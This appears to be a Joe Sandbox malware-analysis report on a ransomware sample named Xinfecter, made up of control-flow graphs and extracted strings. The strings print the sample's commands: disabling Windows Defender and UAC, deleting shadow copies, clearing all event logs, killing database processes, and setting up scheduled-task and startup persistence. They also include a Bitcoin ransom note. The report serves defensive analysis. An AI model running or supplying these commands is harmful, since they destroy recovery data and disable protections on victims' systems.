2842->2848 2845 a9c3fd-a9c410 SetErrorMode SetConsoleTitleW call a858e0 2843->2845 2846 a9c3c7-a9c3ca 2843->2846 2849 a9c390-a9c39a 2844->2849 2855 a9c415-a9c41c 2845->2855 2850 a9c3d0-a9c3da 2846->2850 2848->2839 2849->2849 2853 a9c39c-a9c3bd 2849->2853 2850->2850 2854 a9c3dc-a9c3f9 2850->2854 2853->2843 2854->2845 2855->2836 2859 a9e585-a9e5a2 call b005bb 2855->2859 2980 a9c854-a9c85b 2856->2980 2981 a9c8b6-a9c8cb call a85d90 * 2 2856->2981 2857->2856 2980->2981 2983 a9c85d-a9c864 2980->2983 2990 a9c8cd-a9c8ec call a85d90 * 2 2981->2990 2991 a9c8f2-a9ca02 call aa10a0 call aa10c0 call aaa4d0 call aa1a90 call a78a80 call aa11d0 call a749c0 call aa10a0 call aa10c0 call aaa4d0 call a78a80 call aa9d90 call aa11d0 call a749c0 * 2 call a84500 call aa12b0 2981->2991 2983->2981 2985 a9c866-a9c872 call aaafa0 2983->2985 2985->2981 2992 a9c874-a9c8b3 call aa12d0 * 2 call a792a0 2985->2992 2990->2991 3037 a9ca04-a9ca06 2991->3037 2992->2981 3038 a9cad8-a9cb15 call aa12d0 call a74a20 call a749c0 3037->3038 3039 a9ca0c-a9caa9 call aa9b40 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 3 call aa12d0 call a74a20 3037->3039 3053 a9cb92-a9cbb5 call aa9b40 3038->3053 3054 a9cb17-a9cb8d call aa9b40 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 3 3038->3054 3091 a9caae-a9caca call a749c0 3039->3091 3062 a9cbbc-a9cbf0 call aa12d0 call a74a20 3053->3062 3063 a9cbb7 call a90fa0 3053->3063 3054->3053 3078 a9cc32 3062->3078 3079 a9cbf2-a9cc22 call aa12d0 call a74a20 3062->3079 3063->3062 3084 a9cc39-a9cc41 3078->3084 3098 a9cc27-a9cc30 3079->3098 3089 a9cc5d-a9cc7f call a749c0 3084->3089 3090 a9cc43-a9cc57 call a749c0 3084->3090 3101 a9d02b-a9d1f1 call b18980 call aa37b0 call aa9130 call a73730 call aa3740 call b18980 call a85e60 call ab5c80 call b18980 call a9e5b0 call b18980 call a9e750 call aa0230 call ab2590 call aa0230 call ab23c0 3089->3101 3102 a9cc85-a9ccc2 call aa12d0 call a74a20 call a749c0 3089->3102 3090->3089 3091->3038 3107 a9cacc-a9cad3 3091->3107 3098->3078 3098->3084 3177 a9d1f7-a9d200 3101->3177 3119 a9ccc4-a9ccd1 call aa11a0 3102->3119 3120 a9ccd6-a9ccdc 3102->3120 3107->3037 3119->3120 3123 a9cce0-a9ccfb call aa12d0 call a7aed0 3120->3123 3132 a9cd0d-a9d026 call b18980 call aa3b00 call aa0cc0 call aaae30 call aa3a90 call aa1bd0 * 2 call aa1400 * 2 call aa1360 call aa1b10 call aa1ac0 call aa1360 call aa1b10 call aa1ac0 call aa13c0 * 2 call aa1360 call aa16c0 call aa16e0 call aaa5b0 call aa1170 call aa11a0 call aa13c0 * 2 call aa1360 call aa16c0 call aa16e0 call aaa5b0 call aa11a0 call a77fe0 call aa1b10 call aa1ac0 call aa1a60 call aa1a90 call aa1ac0 call a749c0 call aa1ac0 call a749c0 call aa1ac0 * 4 call a7ac80 3123->3132 3133 a9ccfd 3123->3133 3314 a9d82e-a9d891 call b18980 call a776c0 call ab1ba0 call aa1260 call aa0e90 3132->3314 3135 a9ccff-a9cd02 3133->3135 3136 a9cd04-a9cd0b Sleep 3133->3136 3135->3132 3135->3136 3136->3123 3177->3177 3179 a9d202-a9d26e call a77e30 call aa1b10 call aa1ac0 call aa1360 * 2 3177->3179 3202 a9d270-a9d279 3179->3202 3202->3202 3204 a9d27b-a9d291 call aa1a90 3202->3204 3209 a9d297-a9d2a0 3204->3209 3209->3209 3211 a9d2a2-a9d2c1 call a83f00 3209->3211 3217 a9d2c6-a9d2cf 3211->3217 3217->3217 3219 a9d2d1-a9d30a call aa95d0 call aa1b10 call aa1ac0 3217->3219 3234 a9d310-a9d319 3219->3234 3234->3234 3236 a9d31b-a9d72c call aa1c10 call a77e30 call aa1b10 call aa1ac0 call b18980 call aa37b0 call aa8f40 call aa9580 call aa9470 call a73730 call aa1ac0 * 2 call aa3740 call aa10a0 call aa10c0 call aaa4d0 call b18980 call aa37b0 call aa9490 call aa9470 call aa1ac0 call aa9490 call aa9470 call aa1ac0 call aa3740 call aa1c10 call a84670 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call b18980 call aa3b00 call a73730 call aa3a90 call aa12d0 call a91c90 3234->3236 3396 a9d731-a9d825 call a7ac80 call a749c0 call aa1ac0 * 2 call a7b040 call aa1ac0 call a7b040 call aa1ac0 * 5 call a77d70 call a86020 * 2 3236->3396 3336 a9d8a3-a9dba9 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 10 call aa1bd0 call aa1660 call b25282 call aa1bd0 call aa1660 call b25282 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 8 call aa90a0 3314->3336 3337 a9d893-a9d89e call aa1170 3314->3337 3489 a9dbaf-a9dbc0 call a7f5e0 3336->3489 3490 a9dd17-a9dd28 call aa90a0 3336->3490 3337->3336 3396->3314 3458 a9d829 call a7b040 3396->3458 3458->3314 3495 a9e4a4-a9e580 call a78780 call aa1ac0 * 3 call a749c0 call a778d0 call a749c0 * 2 call aa1ac0 * 8 call a749c0 * 3 call aa1ac0 3489->3495 3496 a9dbc6-a9dcb7 call aa9b40 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call a749c0 * 5 call aa1090 * 2 call b259c6 3489->3496 3497 a9dd2e-a9e0a3 call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 3490->3497 3498 a9e450-a9e461 call aa90a0 3490->3498 3495->2859 3601 a9dcb9-a9dd00 call aa9c70 call aa11d0 call a749c0 call aa1090 * 2 call b259c6 3496->3601 3602 a9dd03-a9dd12 call a749c0 3496->3602 3687 a9e0a9-a9e42f call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call a75240 * 2 3497->3687 3688 a9e434-a9e44e call a75240 * 2 3497->3688 3507 a9e491-a9e49d call a8f570 3498->3507 3508 a9e463-a9e478 call a8daf0 * 2 3498->3508 3507->3495 3522 a9e49f 3507->3522 3508->3495 3533 a9e47a-a9e48f call a8daf0 * 2 3508->3533 3522->3495 3527 a9e49f call a8f570 3522->3527 3527->3495 3533->3495 3601->3602 3602->3495 3687->3688 3688->3495
                                                                                                        APIs
                                                                                                        • GetConsoleWindow.KERNEL32 ref: 00A9C1B9
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00A9C1C2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ConsoleShow
                                                                                                        • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$" start= auto$" start=auto$.K0H$21L0I$:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Fast$Lpath$Manual_Mini_Config$Mini_Config$Mini_Config$Normal_Config$Second Email :$Version 5.$\AppData\N-Save.sys$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\Start Menu\Programs\Startup\Xinfecter.exe$user$c$dcdcf$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$spath$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$u4g8$ver$Z0
                                                                                                        • API String ID: 3999960783-4156082234
                                                                                                        • Opcode ID: fd5343d9a4549fd505171ddcade8271c228d43e1d970510fbb40702e6788532b
                                                                                                        • Instruction ID: 3c812ca272666566f112cdd9365dd9b185877db88488b5ad92ea8fde477a2fc7
                                                                                                        • Opcode Fuzzy Hash: fd5343d9a4549fd505171ddcade8271c228d43e1d970510fbb40702e6788532b
                                                                                                        • Instruction Fuzzy Hash: CCD2D331E14258AADB24F774CE56BEDB7B49F22340F4481E9A449672D2EF701F48CB92
                                                                                                        Function 00A792A0 Relevance: 59.2, APIs: 1, Strings: 32, Instructions: 1466COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 4744 a792a0-a79340 call aa6c20 * 2 4749 a79342-a7934c call aa6c20 4744->4749 4750 a79351-a793a0 call aa12d0 * 2 call aab790 4744->4750 4749->4750 4758 a793a6-a793db call b18400 4750->4758 4759 a794eb-a795bc call aa9b40 call aa80d0 * 2 4750->4759 4764 a793e1-a79442 call b18400 call aa9b40 4758->4764 4765 a7ac48 call aa8080 4758->4765 4777 a795f3-a7961d 4759->4777 4778 a795be-a795d3 4759->4778 4785 a79444-a7944d 4764->4785 4786 a794ae-a794b4 4764->4786 4772 a7ac4d call b25132 4765->4772 4776 a7ac52 call b25132 4772->4776 4789 a7ac57 call aa8080 4776->4789 4783 a79654-a79680 4777->4783 4784 a7961f-a79634 4777->4784 4781 a795d5-a795e3 4778->4781 4782 a795e9-a795f0 call b00c3c 4778->4782 4781->4776 4781->4782 4782->4777 4794 a79686-a7968e 4783->4794 4795 a79a44-a79a8f call aa6c20 4783->4795 4792 a79636-a79644 4784->4792 4793 a7964a-a79651 call b00c3c 4784->4793 4787 a79484-a794ab 4785->4787 4788 a7944f-a79464 4785->4788 4786->4759 4791 a794b6-a794cb 4786->4791 4787->4786 4797 a79466-a79474 4788->4797 4798 a7947a-a79481 call b00c3c 4788->4798 4807 a7ac5c call b25132 4789->4807 4801 a794e1-a794e8 call b00c3c 4791->4801 4802 a794cd-a794db 4791->4802 4792->4776 4792->4793 4793->4783 4796 a79690-a79697 4794->4796 4811 a79ab1-a79b1e call aa9de0 call aa80d0 4795->4811 4812 a79a91-a79aac call aa6c20 * 2 4795->4812 4796->4795 4805 a7969d-a796a3 4796->4805 4797->4772 4797->4798 4798->4787 4801->4759 4802->4772 4802->4801 4805->4796 4813 a796a5-a796e3 call b18980 call aa3b00 4805->4813 4820 a7ac61 call b25132 4807->4820 4834 a79b55-a79b64 4811->4834 4835 a79b20-a79b35 4811->4835 4812->4811 4832 a79953-a79960 4813->4832 4833 a796e9-a79754 call ab0210 4813->4833 4828 a7ac66 call b25132 4820->4828 4836 a7ac6b-a7ac70 call b25132 4828->4836 4841 a79966-a7998a call aa7930 call b21daa 4832->4841 4842 a79962-a79964 4832->4842 4856 a7980a-a79834 call aab8d0 4833->4856 4857 a7975a 4833->4857 4843 a79b66-a79b70 4834->4843 4844 a79b88-a79be1 call aa9de0 call aa80d0 4834->4844 4838 a79b37-a79b45 4835->4838 4839 a79b4b-a79b52 call b00c3c 4835->4839 4838->4828 4838->4839 4839->4834 4850 a7998d-a7999e call aa7a00 4841->4850 4842->4850 4845 a79b72-a79b79 4843->4845 4878 a79c24-a79c3d 4844->4878 4879 a79be3-a79bf8 4844->4879 4845->4844 4853 a79b7b-a79b81 4845->4853 4868 a799a0-a799c5 call a73740 4850->4868 4869 a799ca-a79a40 call aa47b0 call ae8cbf 4850->4869 4853->4845 4860 a79b83 4853->4860 4874 a7991b-a79922 4856->4874 4875 a7983a-a7989b call aab8d0 * 2 4856->4875 4864 a79760-a79767 4857->4864 4866 a79c74-a7ab47 call aa9de0 call aa80d0 * 32 call aa6dc0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call a749c0 * 37 call b18980 call aa1e80 call aaa1e0 call aa1e40 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1bd0 call b18980 call aa3980 call aa9470 call aa3910 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1bd0 call b18980 call aa3980 call aa9470 call aa3910 call b25282 4860->4866 4871 a7979b-a797ae call aa6950 4864->4871 4872 a79769-a7976b 4864->4872 5132 a7ab81-a7ac47 call a7ae10 call aa1ac0 call a749c0 call a7ae10 call aa1ac0 call a749c0 call a7ad10 call a749c0 * 10 call b005bb 4866->5132 5133 a7ab49-a7ab50 4866->5133 4868->4869 4869->4795 4897 a797e7-a797ee 4871->4897 4898 a797b0-a797b6 4871->4898 4881 a79796-a79798 4872->4881 4882 a7976d-a79774 4872->4882 4874->4832 4884 a79924-a79933 4874->4884 4875->4789 4923 a798a1-a798e1 call aa6c20 call b21d0c 4875->4923 4878->4866 4890 a79c3f-a79c54 4878->4890 4887 a79c0e-a79c1c call b00c3c 4879->4887 4888 a79bfa-a79c08 4879->4888 4881->4871 4891 a79776-a7977c 4882->4891 4892 a79783-a79787 4882->4892 4894 a79935-a79943 4884->4894 4895 a79949-a79950 call b00c3c 4884->4895 4887->4878 4888->4836 4888->4887 4901 a79c56-a79c64 4890->4901 4902 a79c6a-a79c71 call b00c3c 4890->4902 4891->4892 4903 a7977e-a79781 4891->4903 4905 a7978c-a7978f 4892->4905 4894->4820 4894->4895 4895->4832 4904 a797f2-a79804 call ab0210 4897->4904 4909 a797d3-a797d7 4898->4909 4910 a797b8-a797bf 4898->4910 4901->4836 4901->4902 4902->4866 4903->4905 4904->4856 4904->4864 4905->4881 4916 a79791-a79794 4905->4916 4924 a797dc-a797df 4909->4924 4910->4909 4919 a797c1-a797d1 4910->4919 4916->4871 4919->4924 4934 a79915-a79918 4923->4934 4935 a798e3-a798f5 4923->4935 4924->4897 4927 a797e1-a797e5 4924->4927 4927->4904 4934->4874 4937 a798f7-a79905 4935->4937 4938 a7990b-a79912 call b00c3c 4935->4938 4937->4807 4937->4938 4938->4934 5133->5132 5135 a7ab52-a7ab6e call aa1bd0 call aa1660 call b25282 5133->5135 5146 a7ab73-a7ab7c call aa1ac0 5135->5146 5146->5132
                                                                                                        APIs
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A79A38
                                                                                                          • Part of subcall function 00B21D0C: DeleteFileW.KERNEL32(?,?,00A798D8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B21D14
                                                                                                          • Part of subcall function 00B21D0C: GetLastError.KERNEL32(?,00A798D8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 00B21D1E
                                                                                                          • Part of subcall function 00B21D0C: __dosmaperr.LIBCMT ref: 00B21D25
                                                                                                        Strings
                                                                                                        • :\Users\ReadMe.hta", xrefs: 00A79ACB
                                                                                                        • rem, xrefs: 00A792F4
                                                                                                        • @echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"), xrefs: 00A7AADA
                                                                                                        • \AppData\S-2153.bat, xrefs: 00A7AAA7
                                                                                                        • a5m6f, xrefs: 00A79822, 00A79845
                                                                                                        • \AppData\S-6748.bat, xrefs: 00A7955D
                                                                                                        • ):secttwotasklist /fi "ImageName eq , xrefs: 00A79F49
                                                                                                        • \AppData\S-8459.vbs, xrefs: 00A7A9F1
                                                                                                        • "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, xrefs: 00A79A4F
                                                                                                        • ">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST , xrefs: 00A79D39
                                                                                                        • :\Users\, xrefs: 00A794EB, 00A7A9C7, 00A7AA7D
                                                                                                        • Xinfecter.exe" (IF EXIST ", xrefs: 00A7A425
                                                                                                        • " /fo csv 2>NUL | find /I ", xrefs: 00A79C8D, 00A79FF9
                                                                                                        • kaj3n, xrefs: 00A79865, 00A79BA1
                                                                                                        • " Xinfecter.exe , xrefs: 00A79E99, 00A7A2C9
                                                                                                        • "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\, xrefs: 00A79AA4
                                                                                                        • l, xrefs: 00A7AB19
                                                                                                        • Xinfecter.exe" (start /d , xrefs: 00A79DF3, 00A7A215
                                                                                                        • schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr, xrefs: 00A7A7D1
                                                                                                        • (goto secthree):akakak, xrefs: 00A7A7A3
                                                                                                        • ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST , xrefs: 00A7A771
                                                                                                        • @echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D, xrefs: 00A79C77
                                                                                                        • (goto secttwo:sectonIF EXIST , xrefs: 00A7A165
                                                                                                        • ">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST , xrefs: 00A7A0A9
                                                                                                        • )IF NOT EXIST , xrefs: 00A7A375
                                                                                                        • cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, xrefs: 00A7AB33
                                                                                                        • schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f, xrefs: 00A7AB52
                                                                                                        • Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel, xrefs: 00A7AA24
                                                                                                        • Xinfecter.exe, xrefs: 00A79686, 00A79B66
                                                                                                        • slow, xrefs: 00A79344
                                                                                                        • rem a5m6f, xrefs: 00A79B8B
                                                                                                        • (start /d , xrefs: 00A7A529
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteErrorFileIos_base_dtorLast__dosmaperrstd::ios_base::_
                                                                                                        • String ID: ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST $):secttwotasklist /fi "ImageName eq $)IF NOT EXIST $schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr$ (goto secthree):akakak$ (goto secttwo:sectonIF EXIST $ (start /d $" /fo csv 2>NUL | find /I "$" Xinfecter.exe $"%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\$"%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST $">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST $:\Users\$:\Users\ReadMe.hta"$@echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs")$@echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D$Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel$Xinfecter.exe$Xinfecter.exe" (IF EXIST "$Xinfecter.exe" (start /d $\AppData\S-2153.bat$\AppData\S-6748.bat$\AppData\S-8459.vbs$a5m6f$cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat$kaj3n$l$rem$rem a5m6f$schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f$slow
                                                                                                        • API String ID: 969238624-3584783570
                                                                                                        • Opcode ID: 7235b49b432bf51a04295e0479eba0f1ce2cc0bc069a360e57a48f29d34edf13
                                                                                                        • Instruction ID: 3de264444d94e6c8e8ca3a9fca8c61a802edb1bab27909f895b56504c93b9853
                                                                                                        • Opcode Fuzzy Hash: 7235b49b432bf51a04295e0479eba0f1ce2cc0bc069a360e57a48f29d34edf13
                                                                                                        • Instruction Fuzzy Hash: 60F26970D14258CEDB24DF64CE55BEEB7B0AF55304F0082D9E109672A2EBB5AB88CF51
                                                                                                        Function 00A9D08F Relevance: 58.5, APIs: 1, Strings: 32, Instructions: 777COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 5178 a9d08f-a9d0f0 call aa11a0 call b18980 call aa37b0 call aa9130 call aa3740 5189 a9d0f9-a9d1f1 call b18980 call a85e60 call ab5c80 call b18980 call a9e5b0 call b18980 call a9e750 call aa0230 call ab2590 call aa0230 call ab23c0 5178->5189 5190 a9d0f4 call a7b040 5178->5190 5213 a9d1f7-a9d200 5189->5213 5190->5189 5213->5213 5214 a9d202-a9d26e call a77e30 call aa1b10 call aa1ac0 call aa1360 * 2 5213->5214 5225 a9d270-a9d279 5214->5225 5225->5225 5226 a9d27b-a9d291 call aa1a90 5225->5226 5229 a9d297-a9d2a0 5226->5229 5229->5229 5230 a9d2a2-a9d2c1 call a83f00 5229->5230 5233 a9d2c6-a9d2cf 5230->5233 5233->5233 5234 a9d2d1-a9d30a call aa95d0 call aa1b10 call aa1ac0 5233->5234 5241 a9d310-a9d319 5234->5241 5241->5241 5242 a9d31b-a9d37f call aa1c10 call a77e30 call aa1b10 call aa1ac0 call b18980 5241->5242 5252 a9d384-a9d396 call aa37b0 5242->5252 5254 a9d39b-a9d525 call aa8f40 call aa9580 call aa9470 call a73730 call aa1ac0 * 2 call aa3740 call aa10a0 call aa10c0 call aaa4d0 call b18980 5252->5254 5277 a9d52a-a9d53c call aa37b0 5254->5277 5279 a9d541-a9d5cd call aa9490 call aa9470 call aa1ac0 call aa9490 call aa9470 call aa1ac0 call aa3740 call aa1c10 5277->5279 5295 a9d5d2-a9d5e5 call a84670 5279->5295 5297 a9d5ea-a9d663 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call b18980 5295->5297 5309 a9d668-a9d67a call aa3b00 5297->5309 5311 a9d67f-a9d70a call a73730 call aa3a90 5309->5311 5317 a9d71b-a9d72c call aa12d0 call a91c90 5311->5317 5321 a9d731-a9d825 call a7ac80 call a749c0 call aa1ac0 * 2 call a7b040 call aa1ac0 call a7b040 call aa1ac0 * 5 call a77d70 call a86020 * 2 5317->5321 5352 a9d82e-a9d891 call b18980 call a776c0 call ab1ba0 call aa1260 call aa0e90 5321->5352 5353 a9d829 call a7b040 5321->5353 5364 a9d8a3-a9dba9 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 10 call aa1bd0 call aa1660 call b25282 call aa1bd0 call aa1660 call b25282 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 8 call aa90a0 5352->5364 5365 a9d893-a9d89e call aa1170 5352->5365 5353->5352 5457 a9dbaf-a9dbc0 call a7f5e0 5364->5457 5458 a9dd17-a9dd28 call aa90a0 5364->5458 5365->5364 5463 a9e4a4-a9e5a2 call a78780 call aa1ac0 * 3 call a749c0 call a778d0 call a749c0 * 2 call aa1ac0 * 8 call a749c0 * 3 call aa1ac0 call b005bb 5457->5463 5464 a9dbc6-a9dcb7 call aa9b40 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call a749c0 * 5 call aa1090 * 2 call b259c6 5457->5464 5465 a9dd2e-a9e0a3 call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 5458->5465 5466 a9e450-a9e461 call aa90a0 5458->5466 5569 a9dcb9-a9dd00 call aa9c70 call aa11d0 call a749c0 call aa1090 * 2 call b259c6 5464->5569 5570 a9dd03-a9dd12 call a749c0 5464->5570 5658 a9e0a9-a9e41e call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 5465->5658 5659 a9e434 5465->5659 5475 a9e491 5466->5475 5476 a9e463-a9e478 call a8daf0 * 2 5466->5476 5480 a9e491 call a8f570 5475->5480 5476->5463 5501 a9e47a-a9e48f call a8daf0 * 2 5476->5501 5485 a9e496-a9e49d 5480->5485 5485->5463 5490 a9e49f 5485->5490 5490->5463 5495 a9e49f call a8f570 5490->5495 5495->5463 5501->5463 5569->5570 5570->5463 5752 a9e424 call a75240 5658->5752 5661 a9e43a call a75240 